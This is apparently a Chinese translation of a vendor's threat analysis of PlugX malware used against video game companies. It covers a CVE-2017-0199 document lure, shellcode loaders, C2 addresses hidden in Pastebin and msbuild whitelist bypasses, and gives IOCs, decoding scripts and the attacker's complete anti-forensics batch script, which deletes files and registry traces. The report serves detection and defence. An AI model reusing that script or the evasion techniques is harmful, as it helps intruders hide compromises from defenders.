當前位置:
首頁 > 新聞 > 屢禁不止:一個敢於將自己注入到殺毒軟體中的鬥士

屢禁不止:一個敢於將自己注入到殺毒軟體中的鬥士

PlugX惡意軟體可以算是攻擊界的老前輩了,自2012年被曝光以來,它就以各種形式被黑客利用,截至目前它還一直活躍在攻擊的最前沿。關於其長盛不衰的攻擊功能,已經有很多個機構對其進行了研究,比如:

1.由Circl機構發布的「TR-12-用於針對性攻擊的PlugX惡意軟體變體的分析」。

2.由JPCert機構發布的「分析最近的PlugX變體- P2P PlugX」。

3.由Airbus機構發布的「PlugX一些未覆蓋點」。

4.由Sophos機構發布的「下一代的PlugX」。

鑒於對其的大量研究,PlugX已經被各個安全廠商重點關注,還為此進行了專門的檢測。儘管如此,它仍然是今天許多攻擊者的首選工具,這意味著如果攻擊者要成功使用PlugX,就要對它進行不斷地升級和創新,才能成功感染目標。

我們在本文中選取了一組被一個攻擊者使用的PlugX樣本,以及他們為避免安全機制而採取的措施。這些攻擊的目標主要是視頻遊戲行業的公司。

在分析中,我們發現了該樣本使用了許多有趣的技術,比如:

1.解決初始C2地址

2.將PlugX與開源工具結合起來才能開始載入惡意軟體

3.避免在磁碟上檢測

為了保護用戶免受本文所述的這個樣本的攻擊,Palo Alto Networks公司採取了以下的方式:

1.Wildfire將本文中提到的所有文件標識為惡意。

2. Traps 4.0可以位本文所介紹的這些濫用的進程載入惡意代碼進行保護。

Palo Alto Networks的AutoFocus客戶可以通過標籤跟蹤本文所介紹的相關示例:ParanoidPlugX

相關IOC會在本文的附錄A中進行詳細介紹。

由RTF文件引發的攻擊過程

我們的介紹會從一個名為「新工資結構2017.doc」的RTF文件開始,它利用了CVE-2017-0199漏洞。攻擊者可能利用此漏洞通過誘使用戶打開處理特殊構造的Office文件在用戶系統上執行任意命令,從而控制用戶系統。RTF文件可以從以下URL下載其初始有效載荷:

hxxp://172.104.65[.]97/Office.rtf

這是一個下載腳本,嘗試下載並執行兩個有效載荷,代碼如下所示:

第一個有效載荷是Windows Installer(MSI)文件,我們對該文件進行了動態分析。我們可以從其操作中看到惡意軟體是PlugX,但是C2地址是一個pastebin.com的URL。利用Pastebin,我們識別了其中的一段代碼,並將其解碼為C2地址,但是查看返回的內容,我們卻無法立即識別C2。

譯者註:astebin是一個很方便的便簽網站,你可以很方便的複製粘貼你的文本內容然後做成便簽分享,很多黑客團隊喜歡把自己的攻擊成果(比如資料庫、代碼)貼在網站上來炫耀。

第二個文件是一個PowerShell腳本,它似乎基於一個載入任意shellcode的Rapid7 Ruby開發腳本。在這種情況下,shellcode是PlugX的副本,與MSI文件中包含的shellcode相同,我們將在下面進行剖析。

.NET包裝器

主要有效載荷是在之前提到的MSI文件中的Microsoft .NET Framework文件中提供的。執行後,.NET Framework包裝器將首先檢查VMware工具是否在後台運行,這一步會通過簡單的搜索任何名為「vmtoolsd」的操作來完成檢查。如果沒有匹配的進程正在運行,則惡意軟體繼續執行,在HKCU Software Microsoft Windows CurrentVersion RunOnce中創建名為「MSASCuiLTasks」的註冊表項以進行持久性注入。此註冊表項會導致惡意軟體在系統重新啟動時再次運行。接下來,它將複製內存中的第一階段shellcode並創建一個運行在其中的shellcode的新線程,負責此執行的代碼如圖1所示。Shellcode雖然未被加密,但是被進行了模糊化處理。

.NET包裝器的主要代碼,Shellcode數組是在一個新線程中創建和執行的

第一個shellcode會負責解密另一個shellcode代碼塊,然後第二個shellcode塊會依次使用RtlDecompressBuffer解壓內存中的主PlugX DLL。像PlugX一樣,最終DLL頭文件會缺少DOS和NT映像頭,它們會被替換為XV而不是MZ和PE,如圖2所示。

解碼的DLL有效載荷的映像頭被替換為XV而不是MZ和PE

最後,第二個shellcode代碼塊將解析導入和重定位並跳轉到DLL的入口點。

shellcode中的加密配置

惡意軟體的配置信息(包括C2信息)在第一個shellcode blob中加密,並作為參數傳遞給主要的PlugX DLL的DllMain函數。此DLL本身還包含連接到埠12345上的本地主機的默認配置。這意味著如果您手動提取DLL並執行它,那麼它將連接到localhost:12345而不是作為初始參數傳遞的實際C2伺服器通過第一個shellcode到DLL。

解密配置

如前所述,實際的配置數據存儲在第一階段的shellcode中,但是它不是以明文方式存儲,而是經過加密和壓縮的。配置數據採用的是JPCert先前描述的相同演算法進行加密,但使用不同的XOR值。

JPCert文章中討論的版本使用的是20140918, 353 ,而我們檢查的版本使用的是20141118, 8389的XOR值。同樣的解密常式也用於此示例的PlugX所需的任何其他字元串混淆或文件加密。解密字元串後,必須使用LZNT1進一步解壓縮。為此,我們可以使用附錄B中所介紹的Python腳本。

解密和解壓縮字元串,然後,我們可以輕鬆識別PlugX配置的各個方面,例如,我們可以看到它被注入到以下這三個過程:

1.%ProgramFiles(x86)%SophosAutoUpdateALUpdate.exe

2.%ProgramFiles(x86)%Common FilesJavaJava Updatejusched.exe

3.%ProgramFiles(x86)%Common FilesAdobeARM1.0armsvc.exe

可以看到,PlugX將自己注入到屬於殺毒產品套件過程的嘗試是特別大膽的一個挑戰。

除此之外,PlugX還會查詢四個PasteBin鏈接以從這些鏈接中提取C2地址:

https://pastebin[.]com/eSsjmhBG

https://pastebin[.]com/PSxQd6qw

https://pastebin[.]com/CzjM9qwi

https://pastebin[.]com/xHDSxxMD

從配置中提取的字元串的完整列表會在附錄D詳細介紹。

提取C2

PlugX具有從給定的URL中提取加密的C2配置的功能,在這種情況下,攻擊者就會創造性地將字元串隱藏在看似合法的文本塊中,從Pastebin檢索的內容的一個例子如下:

---- BEGIN SSH2 PUBLIC KEY ----Comment: "rsa-key"AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=---- END SSH2 PUBLIC KEY ----

乍看起來我們什麼也沒有發現,但是這個例子使用了與Airbus中討論的相同技術。它解析了RSA公鑰加密演算法,尋找 魔法值(magic value)「DZKS」和「DZJS」。然後它讀取和解密這些值之間的內容以產生如下所示的IP地址:

---- BEGIN SSH2 PUBLIC KEY ----Comment: "rsa-key"AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=---- END SSH2 PUBLIC KEY ----

解釋使用此技術加密的字元串的Python腳本在附錄B的Python腳本中給出。

下圖給出了該示例的整個執行流程:

總而言之,攻擊者將許多不同的代碼鏈接在自定義和開放源代碼中,這些都是為了載入PlugX。鑒於組件的數量,攻擊者只需花費一些時間就能繼續使用相同的惡意軟體致力於逃避檢測。

其他PlugX示例

根據上面的發現,我們還發現了其他有趣的PlugX示例。這些示例基於發送到目標組織的類似樣本,攻擊者使用的基礎設施以及樣本的獨特傳送機制來確定。

「偏執」型PlugX

通過對一系列相關的PlugX樣本進行分析,PlugX似乎特別「偏執」於磁碟上的檢測,因此我們採取了特定的反取證步驟來防止在磁碟上被檢測到,比如以下這個樣本:

SHA256:6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb

該文件是一個自解壓RAR,這是PlugX的常見傳送機制,特別是當最終的有效內容將被合法可執行文件載入時。以上的樣本也一樣的使用該方法,因為由載入DLL「BlackBox.dll」的合法簽名的Microsoft二進位執行的最終有效載荷。然而,為了啟動惡意軟體的執行,攻擊者使用執行惡意軟體的批處理腳本,但批處理腳本不僅僅是啟動惡意軟體的執行。運行惡意軟體後,批處理腳本會繼續清除系統上存在的所有跡象,其中包括:

1.刪除安裝期間創建的所有初始文件,以及開始執行期間磁碟上所需的所有相關文件。

2.刪除與提取SFX RAR相關聯的所有註冊表項

3.刪除用戶協助與最近執行的應用程序相關的密鑰條目

4.刪除與最近運行的服務相關的所有註冊表項

顯然,使用這個PlugX的攻擊者為了防止它在磁碟上被檢測到,對註冊表和文件系統中都進行了特別的處理。為此,大多數的腳本運行都會多次執行刪除命令。

這樣一來,檢測人員就很難找到PlugX在磁碟上執行過的證據了,更別說對它進行實時追蹤了,這就意味著必須基於內存或網路的檢測來識別入侵,批處理腳本的完整內容會在附錄C中詳細介紹。

PlugX的開源

在2017年上半年,我們看到攻擊者開始改進這種「Paranoid」版本的PlugX ,因為它在感染系統之後,會讓系統的內存驟然變小,所以攻擊者就想開發一種繞過應用程序白名單技術。為此,他們開始整合開放源代碼技術,特別是已經彙編GitHub中,由用戶SubTee創建技術。例如,以下示例使用msbuild.exe在.NET Framework項目中將惡意軟體載入為Shellcode,有效地繞過了應用程序白名單技術:

此示例大致遵循了GIST曾經發布的關於PlugX的攻擊技術,但是附加的代碼似乎是攻擊者的習慣,它充當了載入shellcode的輔助器。如我們上述列舉的第一個例子,shellcode是另一個PlugX的有效載荷。

在另一種情況下,攻擊者使用從SubTee GitHub項目借用的另一個代碼段,來填寫完全模板化的.NET應用程序白名單繞過文件:

這樣攻擊者就不必編寫任何自己的代碼,而是直接將其shellcode粘貼到模板中,以便將PlugX作為可信應用程序的子進程啟動。

預防措施

雖然PlugX多年來一直被安全商所關注,但它一直處於活躍的狀態,屢禁不止,為此,我們將其活躍的原因進行了如下總結:

1.PlugX的使用者對現有的PlugX惡意軟體已經使用的得心應手了,從而不願意放棄。

2.儘管PlugX的版本進行了多次變異,但攻擊者也很難編寫一個令他們完全滿意的版本,所以每次攻擊,我們都會發現它的功能有所變化。

3.重新開發一種與PlugX一樣複雜的惡意軟體需要付出極大的成本,而且還不一定能成功。

很可能,這三個因素是PlugX流行多年的原因。雖然有許多PlugX攻擊者繼續使用相對平庸的技術來載入惡意軟體,使防禦者能夠輕鬆識別和防止它的執行,但是還有更多的PlugX在使用許多有趣的技術來避免檢測。

特別是,攻擊者已經充分利用開源工具來對它進行升級和改造,並通過github來分享執行有效載荷的許多技巧,這樣的惡性循環,造成了PlugX處於不斷地變化中。不出意外地話,很快就會有許多殺毒產品會把應用程序白名單作為PlugX攻擊防護的重點之一,但可以肯定,很快就會有新的技術來繞過這些防護。

附錄A:相關的IoCs

直接相關:

45.248.84[.]7

172.104.65[.]97

https://pastebin[.]com/eSsjmhBG

https://pastebin[.]com/PSxQd6qw

https://pastebin[.]com/CzjM9qwi

https://pastebin[.]com/xHDSxxMD

間接相關:

域:

msfcnsoft.com

micros0ff.com

msfcnsoft.com

microsoff.net

msffncsi.com

A781195.gicp.net

upgradsource.com

B781195.vicp.net

附錄B:Python腳本

LZNT1解密腳本,只適用於Windows:

import ctypesfrom ctypes import *with open( mysettings.bin , rb ) as f: buffer = f.read() uncompressed_size = len(buffer) * 16uncompressed = create_string_buffer(uncompressed_size)FinalUncompressedSize = c_ulong(0)nt = windll.ntdll# COMPRESSION_FORMAT_LZNT1 = 2res = nt.RtlDecompressBuffer(2, uncompressed, uncompressed_size, buffer, len(buffer), byref(FinalUncompressedSize))if (res == 0): uncompressed = uncompressed[0:FinalUncompressedSize.value]

解碼PlugX配置:

def plugx_decode(data): decode_key = struct.unpack_from(

從Pastebin解碼C2地址:

import structdef decode(buf): res = "" for i in range(0, len(buf) -1, 2): dl = ord(buf[i + 1]) dl = dl - 0x41 dl = dl * 0x10 dl = dl + ord(buf[i]) dl = dl - 0x41 res += chr(dl) return resdef decode_plugx_pastebin(buf): start = buf.find( DZKS ) if start == -1: return None end = buf.find( DZJS , start + 4) if end == -1: return None start += 4 data = buf[start:end] decoded = decode(data) connection_type = struct.unpack_from(

附錄C:a.bat

mscorsvw.execscript del.vbsdel BlackBox.dlldel mscorsvw.exedel BlackBoxdel explorer.execscript del.vbsdel %sfxcmd%del mscorsvw.exedel BlackBox.dlldel BlackBoxdel explorer.exedel del.vbsdel a.batdel %sfxcmd%del mscorsvw.exedel BlackBox.dlldel BlackBoxdel explorer.exedel del.vbsdel a.batreg delete "HKLMSYSTEMControlSet001servicesemproxy" /freg delete "HKLMSYSTEMControlSet002servicesemproxy" /freg delete "HKLMSYSTEMCurrentControlSetservicesemproxy" /freg delete "HKLMSYSTEMControlSet001servicesEmpPrx" /freg delete "HKLMSYSTEMControlSet002servicesEmpPrx" /freg delete "HKLMSYSTEMCurrentControlSetservicesEmpPrx" /freg delete "HKLMSOFTWAREWow6432NodeMicrosoftTracingsvchost_RASAPI32" /freg delete "HKLMSOFTWAREWow6432NodeMicrosoftTracingsvchost_RASMANCS" /freg delete "HKU.DEFAULTSoftwareWinRAR SFX" /f reg delete "HKUS-1-5-18SoftwareWinRAR SFX" /freg delete "HKUS-1-5-18SoftwareMicrosoftWindows Script Host" /freg delete "HKUS-1-5-18SoftwareMicrosoftWindows Script HostSettings" /freg delete "HKUS-1-5-18SoftwareWinRAR SFX" /freg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /freg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountpzq.rkr" /freg delete "HKUS-1-5-18SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /freg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountHRZR_PGYFRFFVBA" /freg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountrkcybere.rkr" /freg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /freg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-19SoftwareWinRAR SFX" /freg delete "HKUS-1-5-19SoftwareMicrosoftWindows Script Host" /freg delete "HKUS-1-5-19SoftwareMicrosoftWindows Script HostSettings" /freg delete "HKUS-1-5-19SoftwareWinRAR SFX" /freg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /freg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountpzq.rkr" /freg delete "HKUS-1-5-19SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /freg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountHRZR_PGYFRFFVBA" /freg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountrkcybere.rkr" /freg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /freg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-20SoftwareWinRAR SFX" /freg delete "HKUS-1-5-20SoftwareMicrosoftWindows Script Host" /freg delete "HKUS-1-5-20SoftwareMicrosoftWindows Script HostSettings" /freg delete "HKUS-1-5-20SoftwareWinRAR SFX" /freg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /freg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountpzq.rkr" /freg delete "HKUS-1-5-20SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /freg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountHRZR_PGYFRFFVBA" /freg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountrkcybere.rkr" /freg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /freg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFX" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindows Script Host" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindows Script HostSettings" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFX" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountpzq.rkr" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountHRZR_PGYFRFFVBA" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountrkcybere.rkr" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFX" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindows Script Host" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindows Script HostSettings" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFX" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountpzq.rkr" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountHRZR_PGYFRFFVBA" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountrkcybere.rkr" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssistCountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /freg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /fdel /s c:windowstemp*.batdel /s c:windowstemp*.datdel /s c:windowstemp*.dlldel /s c:windowstemp*.exedel /s c:windowstemp*.vbsdel %0

附錄D:PlugX提取字元串

https//pastebin.com/eSsjmhBGhttps://pastebin.com/PSxQd6qwhttps://pastebin.com/CzjM9qwihttps://pastebin.com/xHDSxxMD%ProgramData%arm2sv1kDSSMDSSMMicrosoft Office Document Update UtilitySoftwareMicrosoftWindowsCurrentVersionRunJmLI%ProgramFiles(x86)%SophosAutoUpdateALUpdate.exe%ProgramFiles(x86)%Common FilesJavaJava Updatejusched.exe%ProgramFiles(x86)%Common FilesAdobeARM1.0armsvc.exe%windir%system32FlashPlayerApp.exeslaxpastebinmahTszuBzqwUTcGt%ProgramData%arm2sv1kAkgcl

點擊展開全文

喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

愛奇藝等18家視頻網站遭破解,會員視頻可免費觀看
組合利用 AdminSDHolder和SDProp 打造隱蔽域控後門
滲透技巧——Windows日誌的刪除與繞過
實用教程:手動安卓應用中注入msf後門

TAG:嘶吼RoarTalk |

您可能感興趣

殺毒軟體流氓起來真的是惹不起!我下的是殺毒軟體不是全家桶!
「渣男」的手機才會有這款軟體,中一個可以忍,全中的請不要心軟
病毒和殺毒軟體雙雙沒落 你有多久沒中毒了
為什麼現在殺毒軟體免費了,有的人反而不滿意了?
安卓機超六成殺毒軟體沒用,有的甚至「殺自己」
殺毒軟體有坑!三分之二的安卓殺毒軟體的「主業」並不是殺毒
「渣男」手機里才會有的3個軟體,若中一個,你就被「綠了」
對不起,在座的防毒軟體都是垃圾
得到一個能穿越回過去的手機軟體,能否拯救因我而出車禍的哥哥
你還在給自己手機裝殺毒軟體?殺毒軟體用處大嗎?
當電腦病毒開始消失,殺毒軟體的下一步該怎麼辦?
微軟最新系統自帶殺毒軟體,360殺毒軟體的未來何去何從?
有了這三個軟體,讓你的手機流暢到爆
還在用第三方殺毒軟體?說明你已經落伍了,微軟自帶殺軟太厲害
殺毒軟體反成惡意軟體,2/3是假貨,手機還要不要裝安全衛士?
印度封殺中國軟體,從此禁止此類軟體進印,給我國做出了警示!
再不起來戰鬥就要死了,手機廠商推快應用是對軟體壟斷硬體的最後抗爭
「殺毒軟體之父」遭人下毒致昏迷兩天,是他人蓄意謀害還是自導自演?
水中發現軟體生物,整個抓起後受到攻擊,整個人都不好了!
很多人都不知道,手機裝殺毒軟體不僅沒用反而是累贅!